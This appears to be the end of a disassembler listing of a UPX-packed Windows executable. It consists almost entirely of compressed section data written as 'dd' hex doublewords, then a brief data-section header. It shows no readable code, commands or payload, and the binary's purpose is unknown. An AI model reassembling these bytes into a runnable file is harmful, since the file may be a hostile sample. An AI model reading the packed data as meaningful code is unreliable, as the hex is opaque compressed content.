dd 0D0C7C7E0h, 0ACB426E6h, 0D9E6C5BDh, 0C41C97BEh, 0A286DE4Fh
dd 6891D956h, 49604D9Bh, 572F758Bh, 0A019A8EEh, 0DCF525C6h
dd 22A4D16Fh, 48B92D2Dh, 548839F0h, 4E46077h, 4C88161Fh
dd 2493EFEEh, 0AE752904h, 263C6197h, 3EB0C603h, 98FA98A1h
dd 0AF3E549Ah, 167A09E9h, 0C4ABE352h, 45BF29F2h, 0C6DB0A7Ah
dd 0D614CB0Dh, 901D18A8h, 0E841190Dh, 32300E59h, 8C18593h
dd 30E21B26h, 20F18EF7h, 22338906h, 6B17AD42h, 0D06C6949h
dd 258287A9h, 0EC1C41A9h, 0FB0FE2D5h, 0F055D03Ah, 0CF3C80A0h
dd 8F2DDCDCh, 0A0F40F68h, 1EE55D21h, 5AAC9DD0h, 89260DEFh
dd 81E743B6h, 43F6BEDh, 6FA952AEh, 4F7802E4h, 2DFA7EABh
dd 3F60E182h, 9DE6A8DDh, 0E3E84052h, 0AEBBD016h, 7280DBBAh
dd 903A83B1h, 8CA75D8Ah, 4894B04Eh, 9FEF14E1h, 2893083Ah
dd 1E4DF2E5h, 0C24E258h, 0FB8063D2h, 0C649AE7Eh, 0B738B8A0h
dd 0A3BACB63h, 0C810E642h, 12263ECEh, 73A62005h, 248DFD76h
dd 0E8406AAAh, 2FD65885h, 272A2C38h, 9074AF39h, 902F6202h
dd 4D0C8354h, 0BA887551h, 0DF6D3816h, 81D580B6h, 0E19CE6C7h
dd 4733219h, 0F9747BBEh, 74AAC989h, 1D271AD5h, 0CF4805BEh
dd 38D0FE9Dh, 758DBA52h, 5F9EAA0Ch, 0F1C8CCA7h, 656590A6h
dd 2AC187B1h, 0EB3A8AC1h, 0F51866BAh, 718D0F63h, 0EA253652h
dd 85661694h, 4BDAE564h, 2F2EAF03h, 0DA157AB1h, 0D3FE6972h
dd 6944CD1Eh, 0DF84D9FBh, 96B4636Bh, 6E7F2BC3h, 0CFDCC98h
dd 0C79B4532h, 9D3F3FD6h, 64D8F1ADh, 0F67AB909h, 0B40140DFh
dd 6FA8384Eh, 1778D71Ch, 0EE1D9AA9h, 85841D55h, 495DE9F0h
dd 0FEAAAAh, 0C8815166h, 6E2529F3h, 25CFF59Eh, 0CC858E27h
dd 0B63940F9h, 7BC61D62h, 17FB132h, 0F20966D7h, 9DBC275Bh
dd 474DEB19h, 0F4C184B7h, 0A8B5445Eh, 7C511BEBh, 16C8C588h
dd 0A1848D2Bh, 0BD0A0ACDh, 75FACDADh, 1B6D990Ah, 0D01374C0h
dd 51E01768h, 217CC403h, 0D62882B1h, 0B9A24B57h, 417AF410h
dd 4E1B4A8h, 0CAA15358h, 882F3AE2h, 159CEF8Bh, 0ED9F972Bh
dd 0A33B64D2h, 17B27476h, 5F0CEB5Eh, 0D41802BAh, 80AD3279h
dd 5E54FF5Ch, 0C10B6BCh, 0ADB10E4Bh, 453408E0h, 72DBEDABh
dd 0E98B905Fh, 95215FFFh, 6DF7D1FCh, 3A6FEC00h, 97125AE1h
dd 8CD12D2Ch, 4C27D712h
dd 8D700197h, 5591311Eh, 3C08FA97h, 5C0179D6h, 0AAE02727h
dd 0D83EDB71h, 0D15995CAh, 0EAC8A959h, 7EE5AFBCh, 56AC4BD7h
dd 22268FF6h, 0A0E59C9Ch, 0C6B55FEDh, 7A234E3h, 2F3D0EAh
dd 0DD714F24h, 0E9B5D227h, 0C58C86F6h, 0B1C1FEBFh, 9FCDCF96h
dd 0DEEEF008h, 85FD75B5h, 2204E065h, 0D6A12A83h, 3E7ACA62h
dd 1093EFD4h, 0CCE80300h, 1C000CF5h, 0B3C4C2D6h, 0A2DCFF26h
dd 0C47B00D9h, 31D8C1A2h, 510240BDh, 471CBEh, 6D3B718Eh
dd 0DAFBF854h, 9640DB1Ch, 352FEAF1h, 0DAE77819h, 6C74C32Eh
dd 0F0964322h, 0D57F1821h, 42C4D29Eh, 0A01673C9h, 89A82DB2h
dd 0F0638B17h, 5FF8BC41h, 0F51150F3h, 0AA9E7931h, 0C90CDE12h
dd 5D42CB2Fh, 0C4CEC916h, 7F576872h, 3D15DDBEh, 9A99915Eh
dd 4CA1C1D6h, 0A090A5CBh, 50C577BBh, 35791B9Ah, 0DFBD587Bh
dd 83852A52h, 0DF5CCA84h, 0FFAAA7F5h, 75877946h, 6470C0C6h
dd 0B2DCBD93h, 7E714F5Ah, 1AAE3C6Bh, 72223632h, 0E5ADA71h
dd 30B82C6Fh, 0D4A4B446h, 0BF70B907h, 732142FEh, 2E28AA5Ah
dd 740E85E6h, 0D4921978h, 841C606Ch, 61D63235h, 5251EF06h
dd 571243D8h, 1AC4E53h, 6E82973Ah, 9004B91Bh, 0A1F453D2h
dd 6CADCB1Eh, 0ACEA7755h, 32EC2A26h, 353ADBF7h, 97E97EBEh
dd 0A3C82036h, 14D7749Eh, 590D712Dh, 0BEDCF63Ch, 0E12D060Fh
dd 57C032E6h, 0BCEE4471h, 128B0C61h, 0DE882FE1h, 125BD600h
dd 9293C65Ah, 0AF39D6F1h, 0AA18787Fh, 0AB40C0BEh, 752F1422h
dd 0C737ABB9h, 7CDE75FAh, 0A9D7E940h, 865C811Fh, 0BECD4BCEh
dd 67A8C21Bh, 0EBAB8BF7h, 0C5900808h, 270EFCA1h, 0BCA9B09Ah
dd 73B08D09h, 0E3203F7Eh, 7D30CE9Dh, 5F919E6Bh, 0B97859C2h
dd 2A82C91Dh, 4B04A41Eh, 0DC48EB9Ah, 0A2C161BEh, 6B6C1B04h
dd 355C80CBh, 85169CF5h, 79875046h, 1B5A5B77h, 8204B71Eh
dd 0A07E267Ah, 0FF1192D6h, 0D5E0951Bh, 8023921Bh, 7325CEEAh
dd 78F4AB6Dh, 0E3AF85F0h, 0BD8C3044h, 8804A5D9h, 6C7B2323h
dd 0F997A012h, 0B34E616Fh, 0A2787EC8h, 0C63C15D9h, 32CFF278h
dd 0D8995563h, 349C9C3Ah, 87576BFEh, 0F435D5F2h, 0FDFC5264h
dd 5D58B9A6h, 0E7FB5251h, 0C2227B29h, 3320C3FAh, 50DA42E5h
dd 0AAB71E56h, 98065D5h, 48BB18A3h, 1561F4AAh, 0FFBE415Bh
dd 0D4A26B42h, 62A43561h, 0E2A811FAh, 0B34D171Fh, 4EF4F7h
dd 74BCA442h, 0F3323DFFh, 15B4F3C6h, 61D28BA6h, 0AC44967Eh
dd 7D884CDAh, 17FC3183h, 0C2CD8292h, 0C6BC0878h, 0F20A71A2h
dd 0CFE93259h, 9CB0D928h, 0E61CC451h, 0C7E987BAh, 72C4CE86h
dd 0BB217E26h, 94835DCEh, 48F88F50h, 91A42807h, 5CC033E2h
dd 4CEC11EAh, 4CD25765h, 6D2109D6h, 9D0D240Bh, 3C5C8B26h
dd 0A98275F5h, 29FF2746h, 3232D341h, 2CCCB63Eh, 0E7AD7053h
dd 0B88464F6h, 56619CDh, 0B7B9D3AEh, 0BF119EE5h, 457F6246h
dd 0B25022AEh, 0D6297FCEh, 1A08187Ah, 348B433h, 6AAAC612h
dd 0B0760F04h, 0D3EAC035h, 0B8579D06h, 0E8B4EB7Dh, 5C8C2BDFh
dd 36D6E6B7h, 4E2EBAB6h, 305F52A0h, 0ECDC63CCh, 0B157502Fh
dd 7BB4D946h, 0E370A2EFh, 2DD669Eh, 0AE3FADF2h, 99B09D89h
dd 0CBDE3CD2h, 3E80DC8h, 69AD34DEh, 3B9432CCh, 0DDD034FFh
dd 0AD4D109Eh, 73571E1Eh, 0F45FA5DBh, 1B0A7792h, 62BCAB66h
dd 554B546Ah, 0D15EC353h, 1C941822h, 9CB9516Ah, 978803F4h
dd 85EEDD39h, 975496D6h, 0D79EF10Eh, 0E6B2534Bh, 2757C2B4h
dd 0F3B8F446h, 5BCD18BFh, 46630FB2h, 7B3BB632h, 5D9D6022h
dd 307C14E4h, 1FD87C36h, 1F02EDA3h, 80B024C2h, 0D0C9681Eh
dd 4570B7BFh, 0A18498D3h, 834A2221h, 137C21E7h, 0E02D485Dh
dd 2314DE4Fh, 0E970E906h, 60CCE71Eh, 0EDD7872Dh, 0BFA43158h
dd 13E1EEB9h, 4E56AAAEh, 5CF3EA09h, 0D91C684Bh, 25080A2h
dd 6BA6A3DBh, 99DF00Dh, 7964769Fh, 0AA9092D6h, 89148D65h
dd 6DF52CCAh, 17F45452h, 0CACFE8D5h, 0A6AC2850h, 0B9968ABFh
dd 1F88241Bh, 0D923D8D2h, 0C3DC354Fh, 0C0D5EAAAh, 79B48F2Ah
dd 0CB109CACh, 74936EE8h, 28E8AF90h, 0E2434F5h, 490B82FDh
dd 0D410EEA3h, 4B88A2AAh, 9DE14714h, 221CD922h, 6E2D8761h
dd 0EEA15CEDh, 41EF0621h, 3C4B8139h, 13702B83h, 25EBDD4Ah
dd 719FD341h, 71459371h, 0D72C9354h, 0BE9DC567h, 0CF904336h
dd 2D35B9FAh, 4E092FEEh, 3BF83860h, 2378941Bh, 5BC4A702h
dd 0B24E6B99h, 0D968359Ah, 0A5027D16h, 6800E8B9h, 5174E2CEh
dd 3485ACD5h, 8BB99A82h, 85B0CD2Eh, 2E79D668h, 974850B3h
dd 0DFAB480Eh, 0A300FFE9h, 0C78CC327h, 31D28E2Ah, 57812A30h
dd 45703CE8h, 0A3486BDEh, 6428AB7Ah, 0FCD4A216h, 0DC8A6A31h
dd 253C81E6h, 0F9679E2Ah, 0B3D43980h, 0F4AFAF21h, 42AF9A7Ah
dd 5E8D6F5Ah, 5C640D9Bh, 38EDAD9Fh, 8089316Eh, 0F67823E7h
dd 0BED42174h, 1FDA077Dh, 850FD9FEh, 166C2EC5h, 66446894h
dd 871550F2h, 65FCD763h, 0C271D83Fh, 0D64C0506h, 73AB496Dh
dd 3DE514BEh, 0FFE871F2h, 84276A45h, 0E4D1BA83h, 6023632Ah
dd 1D18545Eh, 4D5E5519h, 6B750862h, 0F1DBCB91h, 0F39B96FAh
dd 0AFE85BDFh, 98312592h, 10A3055Fh, 0A748B465h, 0BF5EED53h
dd 0E910C622h, 2E2EDAFAh, 850D58DAh, 7FE4391Bh, 0BC782B19h
dd 4B9CF9F1h, 53FB3D79h, 3BA3C751h, 0C4CFB8Bh, 2287C57Eh
dd 0A9C9B486h, 25F75416h, 0CED75A71h, 3F50339h, 0CDF807DEh
dd 5E837E45h, 6A7341E4h, 0ACF453B3h, 0E85C042Dh, 0F3CFC726h
dd 0FBD0D57Ah, 0A82B4294h, 16CC9C64h, 5C6E2F2Fh, 1CAF81C3h
dd 9C470755h, 366A816Eh, 92CC8D5Bh, 75C3C8C5h, 0D1D4DDB5h
dd 1A5B9FCAh, 86D0A3CDh, 0D2E8A62Bh, 0D99F75FEh, 8AC73699h
dd 64D989BDh, 13C06C3Eh, 0FE2F4CE5h, 0C19E666h, 0B2AE1E20h
dd 0A7104580h, 0B8F8ECE2h, 469CD606h, 0B313FAAh, 2B2B4E11h
dd 34A48B73h, 845361AAh, 0E61E55h, 0B759216Dh, 8CE71441h
dd 98816427h, 22A07535h, 587F3E2Dh, 0E2894A79h, 0B09D485h
dd 6CA96819h, 8DC2EC01h, 35B3001Ah, 42F85005h, 0DD0BFA02h
dd 5F9F03A9h, 0A4549F3Dh, 20E77494h, 898BDC42h, 550229DDh
dd 52C6168h, 0B377C632h, 93E418C9h, 5A1D3792h, 2BB5003h
dd 68E12F4Ah, 4E300DA6h, 805DE30h, 240CBC73h, 60EC133h
dd 0C19E6628h, 162170F7h, 612232CEh, 25BEDF29h, 0E37118BDh
dd 33907D67h, 6CAF203Eh, 0C2483E9Ah, 941E0F9h, 12F6AD52h
dd 1C53F6F2h, 0DFB83CD1h, 734FDE7h, 6150EAE2h, 0B5CCDC9Ah
dd 3E7B17Ah, 0C68B5F29h, 8BE0E8F1h, 58346D05h, 0DBB366A0h
dd 0A1C7BA35h, 61530049h, 79BC0677h, 18256CDFh, 811A33B6h
dd 6F28DCEDh, 851C6A6Eh, 75554557h, 6449FA26h, 0C3060AFh
dd 0D4737A48h, 72614B35h, 0FCF1696h, 1807002h, 4BC0FBC5h
dd 6E270474h, 0A0C6CBF9h, 7F3431E3h, 0ED8CC2BEh, 0D7CB5CE4h
dd 0F591DC62h, 3F80B8C2h, 0EB65F054h, 9C38278Ch, 1025CB15h
dd 0FD03B4A1h, 0AE1EA3C1h, 6F25D6CBh, 30048C26h, 0D8305AD4h
dd 415BEDE6h, 4C933895h, 5D3EAACAh, 0BFD6B0AFh, 9BA5103Dh
dd 3CEB88Ah, 4AC4E716h, 3968451Bh, 7C1745A4h, 40D8B0BEh
dd 0FB5CAE9Fh, 0C7FAA501h, 941C315Fh, 0D568E2D9h, 85E9FE93h
dd 0E5624872h, 72CD3CFh, 5953BCF8h, 9B3690E2h, 2744DB61h
dd 5EECAE1Eh, 66B5371Eh, 1011C309h, 0D700A47Fh, 4F76F53Bh
dd 5A0DEC0Ah, 1147A4Bh
dd 65590357h, 5441641Eh, 59281057h, 3BA99743h, 8B2EE32h
dd 7E89F98Eh, 0E986DC7h, 18DEA3D3h, 54E523A2h, 38AC03D3h
dd 2F21C9CFh, 9AD13FB6h, 62C0DA3Eh, 0C53191DBh, 0B987DECAh
dd 73F4FA08h, 96E4B201h, 0C18C5EFEh, 49E8A6D2h, 902EB096h
dd 0F069D973h, 0EFA47C6Eh, 2FDD02A5h, 2BB42B13h, 3E9391A2h
dd 0FC636941h, 0A4DDA99Fh, 0DC19EB76h, 668045D2h, 265DD132h
dd 0D354F2AEh, 1F45693h, 0CF0F7286h, 0DAA4D1EBh, 5757E407h
dd 0F8FB9C84h, 639F84D3h, 8788A476h, 0DD181CD2h, 819CE0C6h
dd 1E2F37DDh, 97688447h, 363DDBEAh, 0CAE4BE1Ah, 826EDC2h
dd 0A39E2AD4h, 1790226Fh, 0D45444A6h, 0F4B069C6h, 9899B50Eh
dd 0B668B190h, 4245D1D2h, 981F1F2Eh, 0CDFF64BBh, 0AF97472Eh
dd 0E5DC0979h, 806FC21Dh, 28C33DFDh, 60A0CC9Ah, 75A413F6h
dd 0CFB85B72h, 0AE5CA2AEh, 8DB8EA09h, 581415A4h, 0D17C5C96h
dd 63344330h, 43481E06h, 0F2844ED6h, 9C4C2B9h, 2656D3h
dd 0E8B1A807h, 0E0178446h, 95314C5Dh, 0FAFAh, 1197h dup(0)
UPX2 ends
; Section 4. (virtual address 0000F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3100F000h
align 2000h
_idata2 ends
end start